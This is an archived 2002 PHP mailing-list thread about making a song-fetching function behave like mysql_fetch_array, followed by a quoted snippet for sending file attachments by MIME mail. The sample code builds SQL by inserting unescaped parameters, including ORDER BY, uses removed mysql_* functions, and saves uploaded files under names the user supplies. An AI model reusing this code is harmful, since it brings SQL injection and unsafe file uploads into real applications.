<? function getSongByArtist($artist_id,$order='title ASC') { $sql = " SELECT * FROM songs WHERE artist_id='{$artist_id}' ORDER BY {$order} "; $result = mysql_query($sql); if(!$result) { return 0; } else { while($myrow = mysql_fetch_array($result)) { foreach($myrow as $k => $v) { $$k = $v; } $songs["$id"] = array( 'title' => "$title", 'writers' => "$writers", 'video' => "$video", 'artist_id' => "$artist_id" ); } return $songs; } } ?>
I can then do: <? $songs = getSongByArtist(4); print_r($song); ?> ... and it prints the results I'm expecting. All good.
However, I was hoping to use it in a similar way that I use mysql in the above code... something like: <? while($song = getSongByArtist(4)) { echo song['title']; echo song['writers']; echo song['video']; echo song['artist_id']; } ?>
But it's just running through an infinite loop. Perhaps mysql_fetch_array() is doing something magic??? Perhaps I need to return something different in my function?
I guess I could do it as a foreach()...
Justin French
attached mail follows:
Everytime you call the function, it re-runs the sql, and gives you the same list. The only time it wouldn't do that was if the id wasn't found. You could probably change the function to a class, where the constuctor ran the sql, and then you had another method to get the next entry.
----- Original Message -----
From: "Justin French" <justinindent.com.au>
To: "php" <php-generallists.php.net>
Sent: Sunday, August 25, 2002 11:12 AM
Subject: [PHP] trouble with function
> Hi, > > This is the first time I've REALLY tackled multi-dimensional arrays, in > conjunctions with functions. > > I like the way this code works: > > <? > $sql = "select from...."; > $result = mysql_result($sql); > while($myrow = mysql_fetch_array($result)) > { > echo $myrow['colname']; > } > ?> > > So I built a function which returns a multi-dimensional array: > > <? > function getSongByArtist($artist_id,$order='title ASC') > { > > $sql = " > SELECT * > FROM songs > WHERE artist_id='{$artist_id}' > ORDER BY {$order} > "; > $result = mysql_query($sql); > if(!$result) > { > return 0; > } > else > { > while($myrow = mysql_fetch_array($result)) > { > foreach($myrow as $k => $v) > { $$k = $v; } > > $songs["$id"] = array( > 'title' => "$title", > 'writers' => "$writers", > 'video' => "$video", > 'artist_id' => "$artist_id" > ); > } > return $songs; > } > } > ?> > > I can then do: > <? > $songs = getSongByArtist(4); > print_r($song); > ?> > ... and it prints the results I'm expecting. All good. > > > However, I was hoping to use it in a similar way that I use mysql in the > above code... something like: > <? > while($song = getSongByArtist(4)) > { > echo song['title']; > echo song['writers']; > echo song['video']; > echo song['artist_id']; > } > ?> > > But it's just running through an infinite loop. Perhaps mysql_fetch_array() > is doing something magic??? Perhaps I need to return something different in > my function?
attached mail follows:
On Mon, 26 Aug 2002 01:12:56 +1000, you wrote:
>However, I was hoping to use it in a similar way that I use mysql in the >above code... something like: ><? >while($song = getSongByArtist(4)) > { > echo song['title']; > echo song['writers']; > echo song['video']; > echo song['artist_id']; > } >?> > >But it's just running through an infinite loop. Perhaps mysql_fetch_array() >is doing something magic??? Perhaps I need to return something different in >my function?
Your function (which I've snipped for space considerations) is populating a multidimensional array with an entire result set. So if your artist as 4 songs, you'll get a 2 dimensional array where the first dimension has 4 elements. (For that reason, your function really needs to be caled getsongSbyartist, since it gets all the songs an artist has.) In the code above you want to treat your function as if it's returning a one dimensional array containing only one row from the result set.
You're right, you could get the return value from your function, then use:
$songs = getSongByArtist(4);
foreach($songs as $id => $song) { echo song['title']; ... }
But if you really want to use it in a similar fashion to the way mysql_fetch_array() works, you're going to have to change what your function returns. You can use a static variable to store the state of the result set inside your function, and only return one row at a time. For example:
static $myrow; if($myrow = mysql_fetch_array($result)) { foreach($myrow as $k => $v) { $$k = $v; } $song = array ( 'title' => ...); return $song; } else { return false; }
That way your function remembers the position of the result set between calls, and returns one song at a time, until there are no more left, and then it returns false. I haven't tested the above, but it should behave the way you expect.
HTH
attached mail follows:
Fongming schrieb:
> Hi: > > the following is my easy way to send MIME mail with a > attach files. It worked for my own mailing system. > > //-----------Make sure if a file upload or not... > > if(!empty($my_file)) > { > > copy($my_file,"files/$my_file_name"); > $fp=fopen("files/$my_file_name","r"); > //---------------------------------------compose the > MIME > > $version="MIME-Version: 1.0 \n"; //declair the version > $boundary ="b".md5(uniqid(time())); //make the boundary > $body_message=$content.$bottom."\n\n--$boundary \n"; > $my_add_file="Content-Type: ".$my_file_type.";\n > name=\"".$my_file_name."\"\n". > "Content-Disposition: attachment; \n > filename=\"$my_file_name\" \n". > "Content-Transfer-Encoding: base64 \n\n"; > $the_file_content= chunk_split(base64_encode(fread > ($fp,filesize("files/$my_file_name")))); > //use base64 method to encode the file. > $my_add_file .= $the_file_content; //the file > content added. > > //---------------------------------------- > $the_part="Content-Type: multipart/mixed; ". > "boundary = $boundary \n\n". > "This is a MIME encoded mesaage. \n\n-- > $boundary\n\n"; > $the_part2="Content-Type: multipart/alternative; ". > " boundary = $boundary ". > " \n\n--$boundary"; > > $mime .="From: ".$main_address."\n"; > $mime .="Cc: ".$other_address."\n"; > $mime .=$version; > $mime .=$the_part; > $mime .=$body_message; > $mime .=$my_add_file; > $mime .="--$boundary-- \n"; > > mail($main_address,$title,"",$mime); > ?> > <script> > alert("you succeed to send a MIME mail"); > location.href="list.php"; > </script> > <? exit; > } > > ----------------------------------------------------- > This mail sent through IMP: http://web.horde.org/imp/
Looks like a have to have a directory with write permissions where people can upload their files to. Isn't that sort of a security risk? Olli
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]